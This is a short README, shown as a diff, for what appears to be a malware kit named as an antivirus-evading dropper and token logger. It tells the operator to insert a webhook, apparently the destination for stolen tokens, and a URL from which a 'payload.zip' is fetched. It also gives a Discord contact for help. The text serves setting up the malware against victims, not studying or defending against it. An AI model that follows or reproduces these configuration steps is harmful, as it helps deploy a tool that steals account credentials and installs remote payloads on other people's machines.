GreenShadowLegend/dropper_and_token_logger_FUD/README.md

 Add your webhook at line 16

 Add your url at line 31.
-THE DOWNLOADED PAYLOAD NEEDS TO BE "payload.zip". ex: https://YourWebsite/payload.zip
+the source needs to contain "payload.zip". ex: https://YourWebsite/payload.zip

  **If you have more issues add Charon's Ghost#9713 on discord**